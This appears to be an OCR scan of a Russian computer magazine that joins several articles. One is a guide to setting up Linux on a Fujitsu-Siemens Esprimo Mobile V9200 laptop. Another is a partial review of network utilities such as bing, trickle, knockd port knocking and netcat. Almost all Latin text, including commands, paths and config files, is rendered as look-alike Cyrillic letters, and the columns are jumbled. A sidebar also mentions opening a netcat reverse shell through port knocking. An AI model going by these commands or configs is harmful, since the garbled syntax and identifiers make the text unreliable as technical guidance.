Ехргезз зиррогі РСІ Ехргезз Ноіріид бгіѵег; І5АзиррогІ;5иррогІІогРСІ 
Ноііріид] ; 



4. В настройках Сети выбираем поддержку ВІиеІооіЬ и стекдля ѴѴі-Рі : 
ІЧеІѵѵогкіпд зиррогі (ВІиеІооіЬ зиЬзузІет зиррогі (РЕСОММ ргоіосоі 
зиррогЦ ВІиеІооіЬ беѵісебгіѵегз -> НСІ 115В бгіѵег); ѴѴігеІезз (п18021 1 пеѵѵ 
пеШпк іпіегіасе зиррогі; Вепегіс ІЕЕЕ802.1 1 ІЧеІѵѵогкіпд 5іаск (тас8021 1 ]]] ; 
ЩНастройка драйверов устройств: йеѵісе Огіѵегз; 

Включаем поддержку 5С5І устройств: 5С5І беѵісе зиррогі (Іедасу 

/ргос/зсзі/ зиррогі; 5С5І бізк зиррогі; 5С5І СОРОМ зиррогі; 5С5І депегіс 
зиррогі); 

^|Так как 119200 позволяет работать жестким дискам через интерфейс 
ЮЕ, включаем его здесь: 5егіаІАТА(ргоб) апб РагаІІеІАТА(ехрегітепІаІ 
бгіѵегз) (АТА АСРІ Зиррогі; АТА5ЕЕ зиррогі ^ Іпіеі Е5В, ІСН, РІІХЗ, РІІХ4 

РАТА/ 5АТА зиррогі) ; 

■ Дра Йверы для сетевых устройств проводной и беспроводной связи: 
ІЧеІѵѵогк беѵісе зиррогі (ЕіЬегпеІ (1000 МЬіі) 5узКоппесіУикоп2 
зиррогі; ѴѴігеІезз ПАЮ ѴѴігеІезз ЕАІЧ (ІЕЕЕ 802.1 1]-> Іпіеі РРО/ѴѴІгеІезз 
3945АВС/ВС ІЧеІѵѵогк Соппесііоп); 

5.4. Изменяем «родное» разрешение для использования мыши, добав- 
ляем драйвер для работы тачпада и клавиатуры: Іприі беѵісе зиррогі -> 
(Моизе іпіегіасе -> (Ноггіопіаізсгееп гезоіиііоп -> 1280; Ѵегіісаізсгееп 
гезоіиііоп ->800); Еѵепі іпіегіасе; КеуЬоагбз АТкеуЬоагб; Місе-> Р5/2 
тоизе Зупаріісз Р5/2 тоизе ргоіосоіехіепзіоп]; 

т Сенсоры І2С позволяютопределять температуру процессора и многое 
другое: І2С зиррогі -> І2С Нагбѵѵаге Виз зиррогі Іпіеі 82801 (ІСН); 

5.6. Включаем поддержку ѵѵеЬ-камеры: Миііітебіа беѵісез (Ѵібео Еог 
Ыпих; Ѵібео саріигеабаріегз ->Ѵ4Е 165В беѵісез -> 165В Ѵібео Сіазз (ІІѴС] -> 
ІбѴС еѵепіз беѵісе зиррогі); 

Щ7. Включаем поддержку графического адаптера І965СМ (І9151аті1у) и 
ИРМ для него: ОгарЫсззиррогІ -> (/беѵ/адрагі (АСР Зиррогі] Іпіеі 440ЕХ/ 

ВХ/СХ, І8ххапб Е7х05сЫрзеІзиррогІ; Оігесі Вепбегіпд Мападег (ХЕгее86 
4. 1.0 апб ЫдЬегОРІ зиррогі) ІпІе1830М, 845С, 852СМ, 855СМ, 865С -> І915 
бгіѵег); 

^(Выбираем звуковую карточку и соответствующий кодекдля нее: 5оипб 
сагб зиррогі Абѵапсеб ЕіпихСоипб Агсбііесіиге-^ (055 РСМ (бідііаіаибіо) 
АРІ; РСІ зоипб беѵісез-^ Іпіеі НИ Аибіо-> Виііб Реаііек НО-аибіо собес 
зиррогі); 

^(Поддержка ІЧ5В 1.1 и2.0: 115В зиррогі (5иррогІІогНозІ-зібеІІ5В 115В 
зеіесііѵезизрепб/гезитеапбѵѵакеир; ЕНСІ НСИ (И5В 2.0] зиррогі; ОНСІ НСй 
зиррогі; ІбНСІ НСО (тозі Іпіеіапб ѴІА) зиррогі; 115В Мазз5іогаде зиррогі]. 

В СЛУХ И РЕЧЬ 

После установки любой ОС в первую очередья проверяю и настраиваю 
звук. Не будем нарушать эту старую традицию. АІ_5А-ІІЬ и АІ_5А-иШз ( ѵѵѵѵѵѵ. 
аІза-рго|ес1.ога ) — вот все, что нужно для работы звука (незабываем, что 
в некоторых случаях драйвер ядра (Іпіеі НИ Аибіо] должен бытьсобран в 
виде модуля]. Для реконфигурации: 

# аІзасопТ 

Выбираем Іпіеі НО Аибіо и наслаждаемся потоками звука, играясьс кон- 
сольным микшером «аізатіхег». Интегрированные колоночки, правда, не 
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ВЛАД «5ТЕАИН» ГЛАГОЛЕВ 

/ 5ТЕ АІ_ТН@501І ВСЕМ АСЕ. ОКС, ЕЫОЬАѴЕ.ЫЕТ / 





V | ' V I 

Посели пингвина 



на лаптопе 




ОПЫТ ИСПОЛЬЗОВАНИЯ ОС ЫМУХ НА РУЛТ5У-5ІЕМЕМ5 Е5РПІМ0 МОВІІ.Е У9200 



Ни для кого не секрет, что корпорация РифТБи-Зіетепз, желая походить на 
Неѵѵіеіт-Раскагб и Оеіі, не только не игнорирует Ілпих-сообщество, но и вся- 
чески его поощряет, выпуская в последнее время ноутбуки, максимально 
совместимые с Ьігшх. Езргіто МоЪіІе 119200 — один из них. Комфортно ли 
чувствует себя пингвин на этом лаптопе? 



стория беретсвое начало осенью 2007-го, когда я подумывал 
о приобретении некого портативного девайса, способного 
удовлетворить мои потребности в областях разработки про- 
граммногообеспечения, графического дизайна и, конечноже, 
игромании. Поискособи занял около 2-х месяцев. Не могу не отметить ѵѵеЬ- 
сайты, которые помогли мне в этом непростомделе ПихтоЬіІе.огд . ѵѵѵѵѵѵ. 
Ііпих-ІарІюр.пеЕѵѵѵѵѵѵ.доодІе.сопп . После всевозможныхсравнений выбор 
пал на ЕиДзи-Зіетепз, так как нужно было что-то практичное (ип0еЩ,«не 
мажорное» (ипЗопу) и, в общем-то, надежное (ипРоѵегВоок). Дальше я 
оценивал дизайн корпуса и относительную «новизну». Поэтому— 119200. 
Единственноеупоминание о І_іпих на 119200 я нашел на сайте немецкого 
журнала, — да ито, весь(а возможно, и не весь] процесс был описан только в 
печатном издании. В любом случае, я рискнул... и сейчас осознаю, что не зря. 
Мой девиз «ОрепВЗО еѵегуѵѵбеге», конечно, стреском провалился 
(несмотря на то, что эта ОС все равно сейчас стоит на 2-гиговой 50-карте 
в качестве альтернативы: ну нужен, бывает, сетевой функционал, которого 
нет больше нигде]. Почему? Ноутбук для меня — это мультимедийный 
«друг», поэтому без поддержки звуковой карты (привет создателям драйве- 
ра агаііа] вся его мульти меди йность сводится к нулю. 

Даже с моим опытом работы в двенадцати различных ОС (Зоіагіз, Оапл/іп, 
ОЫХит.д.] я быстро осознал, что все это — «дохлый номер». Поэтому, не- 



долго думая, вставил нарезанную болванку с одним Біпих-дистрибутивом 
и на некоторое время забыл, что существуют какие-либо аналоги оного. 
Названия дистрибутива я неупоминаюумышленно, потому что мостатья 
призвана помочь решить проблемы 119200 с ЛЮБЫМ дистрибутивом І_іпих. 

0 БЫТЬ ДРУЖБЕ ИЛИ НЕТ? 

Ниже представлен список совместимости устройств Ріфізи-Біетепз 
Езргіто МоЬіІе 119200 с ядром Біпих, начиная с ветки 2.6.23: 
Н|СР0:ІпіеІСоге20ио-0К 
НАСРІ-ОК 

ЩЗапись СО/ОУО, Т55Тсогр С00Ѵ0ѴѴТ5-І_632Н - ОК 
Щ Клавиатура — О К 
Д Специальные клавиши — ОК 
^[Тачпад, Зупарбсз-совместимый — ОК 
ИЗвук,Н0АІп*еІАІ_С2б2-0К 
^(ЕбзегпеБ Магѵе1188Е8055 РСІ-ЕОідаЬБ-ОК 
НѴѴі-Рі, Іпіеі Р Р 0/ѴѴі ге Іезз 3945АВ 6 - ОК 
Д ѴѴеЬ-камера, Еохііпк — ОК 

■ ВІиеЕооіЬ, СатЬгібде Зііісоп Рабіо, БЫ ВІиеІооОі Оопдіе — ОК 
Д Видео, Іп1:еІ9б5бМ (6МАХ3100] — ОК 

■50 кард-ридер, Оепезуз Бодіс, Іпс. БІ5В2.0 тісгоЗО Реабег— ОК 
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Дл я тех, кто соскучился 



ЕщіЫи-Зіетепз Езргі то МоЬіІе 119200 собственной персоной 



совершенны, но вполнеоправдываютсвое предназначение. 
Встроенный микрофон также работает без проблем. 



Б ЗРЕНИЕ 

Для работы ѵѵеб-камеры я использую ІІСѴіеѵѵ [ ѵѵѵѵѵѵ.ипісар- 
ітадіпд.огд/исѵіеѵѵ.Ыт ]. но наверняка существуют и альтер- 
нативы (стех пор, как поддержка ІІѴС была включена в ядро]. 




БЗ ОСЯЗАНИЕ 

Спецклавиши в X1 1 настраиваются с помощью хтосітар(і). 
Файл .Хтобтар в домашнем каталоге может выглядеть 
следующим образом: 



> ѵѵагпіпд 

хогд-зегѵеги МезаЫЬ 
тесно связаны друг 
с другом (это собира- 
ются «исправить» 
в версии 1 .6], поэтому 
при откате МезаЫЬ 
до 7.0.4 придется 
откатить и хогд-зегѵег 
до 1.4.2. 



$папо~/.Хтосітар 

кеусосіе 17 6 = ХЕ86Аис1іоЕаізеѴо1ите 
кеусосіе 174 = ХЕ86Аис1іоЬоѵ\гегѴо1ите 
кеусосіе 160 = ХЕ86АисііоМике 

Чтобы определить кеусобе-клавиши, используются програм- 
мыхеѵ(1] и зЬоѵѵкеу(І). А соответствия X1 1 — в файле/изг/ 
зЬаге/ХІ 1/ХКеузутОВ. После запуска оконного менеджера 
(ХРСЕ автоматически за пускает хтосі тар с настройками в 
-/.Хтобтар, а во ЕЫхЬохэто нужно сделать принудительно, 
добавив строку «хтобтар -/.Хтобтар» в -/ЧІихЬохМагіир] 
идет настройка соответствия клавишам. Для РЫхЬох это дела- 
ется примернотак: 



Н ПИТАНИЕ И СОН 

Единственное, что нужно для работы АСРІ — это асрісі [ асріб. 
зоигсеЫгде.пеД После его установки создаем файлы в/еіс/ 
асрі/асбопз и /еЫ/асрі/еѵепЫ: 

# тксііг -р /екс/асрі/ {аскіопз , еѵепкз} 

# папо/еІс/асрі/асІіопз/роѵѵег.зН 

# ! /Ъіп/зЬ. 

ескю "сіізк" > /зуз/рочлег/зкаке 

# папо/еІс/асрі/асІіопз/зІеер.зИ 

# ! /Ып/зЬ. 

ескю "тет" > /зуз/рочлег/зкаке 

# папо/еіс/асрі/еѵепіз/роѵѵег 

е ѵепк =Ъик к оп / рохѵе г 
аскіоп=/екс/асрі/аскіопз/рочлег . зк 

# папо/еіс/асрі/еѵепіз/зіеер 

е ѵепк =Ъик к оп / з 1 еер 
аскіоп=/екс/асрі/аскіопз/з!еер . зк 




> і пТо 



Не путай ИВМ и ОВІ. 
ИВМ — модуль ядра 
(например, І91 5. ко], 
работающий на более 
низком уровне. О В I 
— модуль Х-сер- 
вера (і965_бгі.5о] 
для твоего чипсета, 
являющийся частью 
МезаЫЬ. 



$ папо ~/.КихЬох/кеуз 

Ыопе ХЕ8бАисііоМике : ЕхесСогшпапсі атіхег ззек 
"Зреакег" коддіе 

Ыопе ХР8бАисііоЬоѵ^егѴо1ите : ЕхесСоттапсІ атіхег 
-Ч ззек "РСМ" 5- 

Ыопе ХЕ8бАис1іоЕаізеѴо1ите : ЕхесСоттапсІ атіхег 
~ 0 _ ззек "РСМ" 5+ 

Н ФЛЕШ-ПАМЯТЬ И ПРИВОД 

Автомонтирование «подцепленных» йазЬ-устройств и других 
ІІ5В-носителей (втом числе и со встроенного кард-ридера] 
работает, как говорится, «из коробки», если в системеустановле- 
ны 0-Виз, НАЬ и какой-либо графический файловый менеджер 
(ТЬипаг). Обычно подмонтированныеустройства помещаются 
в катал ог/теб іа, а единственному С ОЛМі -устройству можно 
выделить отдельное место, отредактировав файл /еЫЛзЫЬ: 

#папо/е(с/ЫаЬ 

/сіеѵ/згО /тпк/ссігот ізо9660 го,поаико,изег О О 

Запись СО/ОѴО — задача довольно тривиальная, однако я бы 
порекомендовал программы, которые используют библиотеку 

ІіЬЬигп (ІіЬЬигпіа-ргоіескогд ]. а именно, хШигп ( ѵѵѵѵѵѵ.хЫе.огд/ 
рго]есі5/хіЬигп/ ] и В газе го ( ѵѵѵѵѵѵ.дпоте.огд/рпзіесІз/Ьгазего/ ]. 



И выставляем для них корректные права доступа: 

# сЬтосі -Е 644 /екс/асрі/еѵепкз/* 

# сЬтосі -Е 755 /екс/асрі/аскіопз/* 

Послезапуска «асріб»засыпание и выключение питания 
должны работать по соответствующим кнопкам клавиатуры. 
Два часа без подзарядки мне показалось маловато, поэтому 
я заказал из Германии дополнительную батарею. Системой 
она определилась без особых проблем и в мониторчике 
сопку ( сопкѵ.зоигсеЫгде.пеі ] смотрится вкупе с первой очень 
элегантно. 

Н СВЯЗЬСВНЕШНИМ МИРОМ 

Настройка ѵѵігеб сети не должна вызвать проблем, в крайнем 
случае — смотри справочную страницу іісопіід (8). Ас ѵѵігеіезз 
придется немного потрудиться. В первую очередь нужны 
ѵѵігеІез5_ІооІ5 ( Ьр[.Ьр.сот/регзопа[Д1еап ТоиггіІЬез/Ыпих/ 
ТооІз.ЫтІ ]. для работы ѴѴРА/ѴѴРА2 — ѵѵра_зиррІісап* ( Ьозіар. 
еріІезЫѴѵѵра зиррЦсапД] . Приведу пример конфигурацион- 
ного файла для соединения ѴѴРА: 

# папо/еІс/ѵѵра_5иррІісап1.соп* 

# Каталог для сохранения информации о текущих 
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Что СЛОИЛОСЬ с РРЗ? 

Сейчас во многие дистрибутивы «запихивают» недавно вышедшую в свет 
библиотеку МезаІлЪ 7.2 — реализацию ОрепСЬ. Проблема в том, что после пе- 
рехода на 7.2 сотни обладателей І965СМ ощутили дикое падение производи- 
тельности: примерно в 14 раз. ВМезаІіЪ 7.2 была добавлена полная реализа- 
ция І965, и это повлекло за собой такие проблемы. После моей беседы с одним 
из разработчиков БШ-модулядляі965 (Согбоп Лп <§огбопдіп@іпі:е1.сот>) 
проблема была решена созданием файла /егс/бгігс следующего содержания: 

Ыгісопі ><беѵІсе зсгееп=" О» с!гіѵег= " І9 65 " > 



подключениях 

с!:гНіпЪегЕасе“/ѵаг/гіш/ѵфа 
пеІтогк= { 

# Параметры для подключения 
з з і б= " СОМРАБУ_5 8 1 Б " 
зсап_ззіс!=1 

ргоко=Ѵ\П?А 
кеу_тдтк =МРА- Р8К 
раігЫзе="ССМР ТКІР" 
рзк= "ту_ѵегу_зесиге_раззр1ігазе " 

} 

После конфигурирования поднимаем интерфейс и запускаем 
\л/ра_5иррІісапІ: 

# іѵгсопЫд ЫапО 

# ѵтра_зирр1ісапк -В -і ЫапО -Б ѵ^ехк -с /еЫ/ 
ыра_зирр1ісапР . сопН 

Адалее настраиваем сеть либо средствами бЬср, либо статичес- 
ки. Для работы ЫиеІооШ потребуется пакетЫиег іѵѵѵѵѵѵ.Ыиег.огд ]. 
послеустановки которого создаем файл конфигурации: 

# папо/еІс/ЫиеІооІИ/гкотт.соп^ 

гісоттО { 

Ъіпб уез ; 

# МАС-адрес устройства, полученного ко- 
мандой "ПсіРооІ зсап" 

беѵісе 00 : 1Е : 45 : 46 : 97 : АО ; 
сйаппеі 1; 

# Описание линии связи или устройства 
сошшепР " Зопу Егісззоп К550І" ; 

} 

Н ВНЕШНИЙ ВИД 

Времена консолей для ноутбуков, думается мне, прошли. 
И сейчас без проекта Х.Огд Роипбайоп мы не пред- 
ставляем себе ежедневного существования, поэтому 
перейдем к конфигурированию основных секций файла 
/еРс/ХІ 1/хогд.сопР 

# папо/еІс/ХІ І/хогд.согб 

ЗесЫоп " ЕхРепзіопз" 

# Включение композитного менеджера (для исполь- 
зования спецэффектов в сошріг и хісе сошрозіРог) 

ОрЫоп "СошрозіРе" "ЕпаЫе" 

ОрЫоп "КЕШЕК" "ЕпаЫе" 

ЕпсіЗесЫоп 

# Дела "мышиные" 

ЗесЫоп " ІприБВеѵісе" 

ІбепЫііег "Ѵ-МІС" 



<арр1ісаЫоп паше=" БеРаиІР"> 

< орЫоп паше= " ѵЫапк_тосіе" ѵа1ие=" 0"/> 

</арр1ісаЫоп> 

с/беѵісех/сІгісопЫ 

Но падение производительности все же осталось (примерно на 10%, так 
как поддержка ТТМ была вынесена из МезаЬіЪ 7.2), поэтому рекомендую 
откатиться на предпоследнюю стабильную версию МезаЬіЪ — 7.0.4 и по- 
дождать выхода нового ядра Ілпих (2.6.28), где уже можно будет использо- 
вать СЕМ. 



Бгіѵег "тоизе" 




ОрЫоп "Веѵісе" 


" /беѵ/іприЫтісе" 


ОрЫоп 


"Ргокосоі" " ІтРЗ/2' 


ОрЫоп 


" ЕАхізМарріпд" "4 5 


ОрЫоп 


" ЕтиіакеЗВиЫопз" 


"Еаізе" 




ЕпбЗесЫоп 




# Тачпад 




ЗесЫоп " ІприкВеѵісе" 




ІбепЫЫег 


"Ѵ-ТСН" 


Бгіѵег 


" зупарЫсз" 


ОрЫоп 


"Ргокосоі " " 8упР5/2 


ОрЫоп 


" ЗНМСопіід" "Оп" 



# Активация режима скроллинга "ТчлгоЕіпдег" 
ОрЫоп "ѴегЕТУгоЕіпдегЗсгоІІ " "Тгие" 
ОрЫоп "НогігТѵгоЕіпдегЗсгоІІ " "Тгие" 
ЕпбЗесЫоп 
# Клавиатура 
ЗесЫоп " ІприБВеѵісе" 

ІбепЫііег 
Бгіѵег 
ОрЫоп 
ОрЫоп 
ОрЫоп 
ОрЫоп 
ОрЫоп 



"Ѵ-КВБ" 

"кЪб" 

"АиЫКереаЫ "300 30" 
"ХкЬКиІез" "хогд" 
"ХкЬМобеІ" " Пизікзи" 

" ХкЬБау оик " " из , ги " 
"ХкЬѴагіапк " " ,Ыпкеу" 
# Переключение раскладок - СЫІ+8МЫ 
ОрЫоп "ХкЬОрЫопз " "дгр: 

сЫІ_зШЫ_Ыдд1е , сарз : зЫЫ " 

ЕпбЗесЫоп 



И ЗАКЛЮЧЕНИЕ 

Надеюсь, тебе удастся подружить І_іпих и ноутбук (если при- 
держиваться этих советов, то любой, а нетолько 119200]. Не 
забывай: когда возникают проблемы совместимости — сис- 
тема, равно как и железо, всегда дастзнать. Для этого и были 
созданы системы протоколирования. Почаще наблюдай за 
ними, особенно после очередного обновления программной 
части. Засим откланяюсь! И-И 




> Ііпкз 

Официальный сайт 
поддержки РЗ, где 
можно скачать, на- 
пример, готовые 150- 
образы для обнов- 
ления ВІ05: зиррогЕ 
Іидізи-зіетепБ. 
сот/СОМ/зиррог!:/ 
боѵупІоабз.ЫтІ . 




> СІѴСІ 

На нашем дискеты 
найдешь примеры 
конфигурационных 
файлов хогд.сопб 
гкотт.сопб .сопкугс 
и .Хтобтар. 
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Умные игры с сет, 

ОБЗОР НЕОБЫЧНЫХ СЕТЕВЫХ УТИЛИТ 



Главное в хорошей статье — идея. Когда у меня появилась задумка нынеш- 
него обзора, я полез в интернет и всего за несколько часов обнаружил огром- 
ное количество весьма любопытных сетевых утилит, а также массу редких, 
но очень эффектных приемов решения задач, связанных с Сетью. Отбросив 
мусор и сняв самые сливки, спешу о них рассказать. 



Н ИЗМЕРИТЬ И ОБРЕЗАТЬ 

Что делать, если мы хотим узнать пропускную способность нашей сети? 
Наиболее верный путь — выполнить копирование произвольного файла 
с удален ной машины на свою. Лучше всего проделать эту операцию с 
помощью протокола РТР, но подойдеттакже НТТР, 5МВ или дажеЗЗН. 
Главное — выбрать файл подлиннее. Но если ни одного из подобных сер- 
висов на машине нет, измерение скорости передачи может превратить- 
ся в проблему. Особо хардкорныетоварищи в этом случае могут запус- 
тить ріпд и на основе его статистических данных вычислить пропускную 
способность канала. Я же предлагаю не перенапрягать мозг и восполь- 
зоваться утилитой Ьіпд — особой модификацией ріпд, предназначенной 
для измерения скорости передачи данных между двумя хостами. 
Использовать Ьіпд почти также просто, каки его родственника на «р». 
Необходимо указать ІР-адрес локального конца канала и адрес его уда- 
ленного собрата, подождать некоторое время (чем дольше, темточнее 
результат), остановить выполнение комбинацией <01x1+0 > и найти в 
выводе команды строчку «езбтаіесі Ібгоидбриі». В ней и будетуказана 
средняя пропускная способность канала, измеренная в байтах в секунду. 
ОК, скорость передачи мы узнали, но для некоторых приложений подоб- 
ный «реактивный режим» будет излишеством. На хлюпеньком 256-ме- 



габитном канале дажезапущенный в фонеѵѵдеі можетпринести массу 
проблем при чтении форумов или интенсивном поиске в боодіе, а много- 
поточный менеджер загрузок вообще съест весь канал и не поперхнется. 
Умерить пыл таких программ можно с помощью хорошего брандмауэра, 
но не стоитзаниматься мазохизмом, и на каждый чих вписывать правила 
и через пару часов убирать их изтаблиц. Для подобных случаев есть 
другой, более удобный инструмент — Іхіскіе. 

Тгіскіе работает в пользовательском режиме, нетребует привилегий 
го оі: и позволяетустановить различные скорости закачки/отдачи для 
нескольких приложений одновременно. Использовать его очень просто 
— достаточно указать ожидаемые пороги скорости в кб/с, имя ограни- 
чиваемой программы и ее аргументы. К примеру, ограничим скорость 
закачки ѵѵдеі до 10 кб/с: 

$ Сгіскіе -сі 10 ѵ^деС Ткр : //Ткр .Тюзк . сош/Ьід_1і1е . Саг . дг 

И запустим сервер РТР со скоростями закачки/отдачи, равными 30 кб/с 
и 20 кб/с: 

# Сгіскіе -сі 30 -и 20 Ткрсі 
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ИВ по-настоящему удобен 



Еслиты ограничиваешь пропускную способность для 
нескольких приложений одновременно, то перед стартом 
Іхіскіе запусти специальный демон Іхіскіесі, который будет 




обслуживать множественные инстанции утилиты и снизит 



Сетевой Іор в действии 



нагрузку на процессор. 



Н СТУЧИМСЯ В ПОРТЫ 

«Рог! кпокіпд» (в дословном переводе на родной и 
могучий — «Стучаться в порты»), есть не что иное, как 
метод произведения каких-либо действий на стороне 
сервера с помощью последовательного опроса опре- 
деленных портов. Проще говоря, это то же самое, что 
последовательность стуков в дверь, после которой за 
ней появляется параноидального вида мужик и быстро 
впускает Штирлица внутрь. В компьютерном мире роль 
параноидального мужика обычно выполняет специаль- 
ный демон, прослушивающий порты, а Штирлиц — это 
мы (те, кто хочет «войти»), Нуадверь, как не трудно 
догадаться, это брандмауэр, открывающий определен- 
ный порт (обычно 55Н). 

«Стук в порты» — очень интересный прием со множеством 
плюсов. Он абсолютно невидим для постороннего. С его 
помощью легко защитить сервисы отбрутфорса или БоЗ- 
атак. При правильном использовании — он оченьстойкий к 
подбору комбинаций портов. 

Существует масса самых различных реализаций этой 
техники, начиная от самопальных скриптов, написанных 
первокурсниками, и заканчивая плагинами для іріаЫез, 
но наиболее любима в народе, проста в использовании и 
богата на функционал система кпоск ( мѵѵѵѵ.гегоІЧих.огд/сді- 
Ьіп/сѵзіхас/кпоск/ѵѵікі/ ). О ней и поговорим. 

Настроить кпоск нетрудно: 

1. Конфигурируем брандмауэртаким образом, чтобы все 
незанятые реальными сервисами порты выше 1024 были 
открыты. Часть из них незаметно будет слушать наш демон. 
Портзащищаемого сервиса оставляем закрытым. 

2. Создаем файл /еСс/кпоскй. сопі и пишем в него 
примерно следующее: 

# ѵі /еіс/кпосксі.соггі 

[ззк-ореп] 

зедиепсе = 1111,2222,3333 
зед_БітеоиБ = 10 
Ссрііадз = зуп 

сошшапсі = /изг/зЪіп/ірРаЫез -А ШРБТ -з 
%ІР% — сірогр 22 -д АССЕРТ 

[ззЪ-сІозе] 



зедиепсе = 3333,2222,1111 
зед_ЫтеоиБ = 10 
Ссрііадз = зуп 

соттапсі = /изг/зЪіп/ірРаЫез -Б ШРБТ -з 
%ІР% — сірогр 22 -3 АССЕРТ 

3. Запускаем демон: 

# кпосксі — с! 

4 . Беремтакси, едем домой и на домашнем компе выполня- 
ем команду: 

$ кпоск ту . Іоѵеіу . зегѵег . сот 1111 2222 3333 

5 . Подключаемся 55Н -клиентом к серверу и делаем то, что 
нужно. 

6. Благополучнозакрываем 55Н-порт: 

$ кпоск ту . Іоѵеіу . зегѵег . сот 3333 2222 1111 

Отныне злодей даже и не догадается о том, что на твой 
любимый сервер можно проникнуть извне. Для него 55Н- 
порт всегда будетзакрыт (открывается он только для того 
ІР, с которого был осуществлен «стук»). Но и это еще не 
все! Заказавтакси прямо сейчас, ты сможешь вернуться к 
серверу и получить в подарокеще более надежную технику 
конспирации: 

# ѵі /еіс/кпосксі.соггі 

[ззЪ.] 

зедиепсе = 1111 :ис!р, 2222 : Сер, 33 33 :ис!р 
зед_ЫтеоиР = 15 
Ссрііадз = зуп,аск 

зРагР_соттапс1 = /изг/зЬіп/ірРаЫез -А ШРБТ 
-з %ІР% -р Сер --зуп --сірогр 22 -з АССЕРТ 
стс!_ЫтеоиЦ = 10 

зРор_соттапс1 = /изг/зЬіп/ірРаЫез -Б ШРБТ 
-з %ІР% -р Сер --зуп --сІрогЦ 22 -д АССЕРТ 

Это более интересный способ открытия порта, использую- 
щий сразудва приема повышения безопасности. Во-пер- 




> ІП^О 

• Пропускную 
способность Сети 
гораздо проще и 
эффективнее из- 
мерять с помощью 
утилиты ірег{ ( 
пІапгпеДРгоіесіз/ 
ІрегЯ . но Ьіпд вошел 
в наш обзор благо- 
даря необычности 
дизайна. Кроме 
того, на некоторых 
ВЗБ-системах ірегі" 
показывает невер- 
ные результаты. 

• С помощью кпоск 
легко организовать 
не только откры- 
тие портов, но и 
множество других 
полезных вещей. 
Это может быть, на- 
пример, обратный 
зНеІІ, описанный 

в разделе про 
пеісаі, команда, 
перезагружающая 
определенный 
сервис, или скрипт, 
отправляющий 
отчет о состоянии 
сервера на телефон 
по 5М5. 
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іхоігі 

А 



$ пс -е 1 іп ірзес езр/кгапзрогк//гедиіге ' 
-е ' оик ірзес езр/кгапзрогк/ /гедиіге ' 
172.16.69.143 31334 



$ кпоск 1111:исір 2222 :кср 3333:ис3р & ззЪ. 
шу . Іоѵеіу . зегѵег . сот 



# еско 1 гесИгеск-2525-ко-25 2525/кср' » /екс/ 
зегѵісез 



Важно понимать, что существует несколько версий пеісаі, 
поведение которых может отличаться. Экземпляр, постав- 
ляемый с дистрибутивами Ыпих, — это оригинал, дожив- 
ший до наших дней. Все пять приведенных примеров он 
отработаетбез проблем. Версия под названием 6ІЧІІ Ыеісаі 
не поддерживает; опции 1 -е 1 , поэтому второй и пятый 
примеры она не воспримет. 

Особого внимания заслуживает пеісаі, распространяемый 
вместе с ВЭО-системами, опция 1 -е 1 в нем есть, но пред- 
назначена она для шифрования входящего и исходящего 
трафика методом ІРЭес Е5Р: 



Измеряем пропускную способность канала 

вых, теперь Штирлиц должен долбить в дверь нетолько 
рукой, но и ногой, то есть «стучать» и в ТОР, и в ІЮР-порты. А 
во-вторых, брандмауэр откроетЭЭН-портдля входящих со- 
единений только на 10 секунд, в течение которых мы должны 
успеть установить 55Н-соединение (естественно, іріаЫез 
должен быть сконфигурирован так, чтобы он без вопросов 
пропускал любой трафикуже установленных соединений]. 
Конечная команда на подключение выглядит следующим 
образом: 



Крометого, В5Р ЫеІсаІ способен подключаться кудаленной 
машине через прокси: 

$ пс -х172 . 16 . 64 . 1 : 8080 -ХсоппесС 
172.16.69.143 31334 

В этом примере прокси находится по адресу 
172.16.64.1 :8080, а флаг 1 -ХсоппесС ' говоритотом, что 
он является НТТР-прокси. Также поддерживаются 50СК5 
версий 4 и 5, но о них следует информировать пеісаі: через 
флаг ' -Х4 1 или 1 -Х5 1 . 

Сам пеісаі легко использовать в качестве прокси или 
редиректора портов, но в этом случае его лучше связать с 
демоном і пеісі : 



Зѳиюп БгігС ѵй?ѵг ВспЙгГіагаь ЙрИіг гаь 



йсліГіоЫ - - 5ЬаШ - Коггьоіе 



чийп Ь~і и ^ 127,0.0.] ынн. уаНп-п. гот 

ОІІІС 127. 0.т. 1 (12/. 0.0 1) ѵлѵѵѵ.уаНсіи ІііЗ .□Кайпь.т?! (8 /.24?. 113. 14) 
4-1 дпй 108 гіаГл ОуГеч 

1024 Ыіъ Іп 10. ІЗОтпь : 5ІЗ«аЬрі, 0 . 018 7 30*і рсг Ы С. 

1024 Ыхь Іп 5.931*5: 171209Ьр5, 0.005841*5 рег Ыі 

1024 Іп 14 . 0101*5 : 7289 ЗЬр*. 0.013710*5 ре г Ьіі 

1024 Мті Іп 11 . 111 * 5 : 92161Ьрз, 0.010851*5 рег Ыі 

1074 ЫГч Іп ІЗ.ОбЧтч: /ВІЪЗЬрч, 0.0127ЁЗпі5 рег ЬіГ 

1024 Ыі* Іп 14.047ін: /2898Ьр:>, 0.013718*5 Ьіі 



12 /.0.0.1 ыаъ 1 б I і с з 
Ьуіеі оиі Іп йир Іоья 



гіі (пі) : *1п 
0.040 
0.016 



нтмг.уйіірр ЫЗ . акагіпз . псі ЫаІІЫіс.5 
Ьуте.ч пит Іп 4ир Іплч ггг (иік}: *іп аѵд тли 

44 23 25 0% 183.050 100. 02Ь 203. /61 

108 25 24 4* 19/. 997 206.212 231.996 

— е&Птаіей Ипк сПйгасіегіітіса --- 

нагпіпу: гТТ Ьід НичЮ 0.016*5 с гГТ йгааіі йпчТ? 0.040 ліб 

слит.! Іей ІИ гои у Н ри I 7 28У8Ьръ 

гвілітипі Йеіау рег паске* 174,253т* (12703 ЬІТ5} 

аѵегауе аіагізіісі (ехрегТтепсаІ) : 
раскеЧ Іпчч: 5ілаП ОЖ, Ьіу Л% л ГпГаІ 2% 

«агпіпу; ПІ Ыу НоЫІ У.ОІ/тъ гіі ьплі ІІ биъі.2 0.043ть 
аѵеглур ГЬгпирМриТ БЗ?Ё5Ьрч 

аѵі:г'чяус йсіау рог раскеі 180. 325т;; (13145 Ьііѵ) 
иеідіііей аѵегаде іНгоиуйріл: 61999Ьрз 

-д ІтФІосаІ Ьові>-(~>- 

- ( 1 і пНЛ 1 педі Ьааг) - (“) - 
( 0 : 01 -> | 



В НЕЗАМЕНИМЫЙ ЫЕТСАТ 



# еско ' гес1ігесЦ-2525-Цо-25 зкгеаш Сер пежаік 
покосіу /изг/Ьіп/пс пс -ѵг 2 127 .0.0.1 25 ' » 




> Ііпкз 

• ѵѵѵѵѵѵТгеепіхТг/ 
Ігеепіх/Іодісіеіз/Ьіпд. 
Ыті 

• ѵѵу.топкеу. 
огдА-тагіизАгіскІе 
ѵѵѵѵѵѵ.гегоАих.огд/сді- 
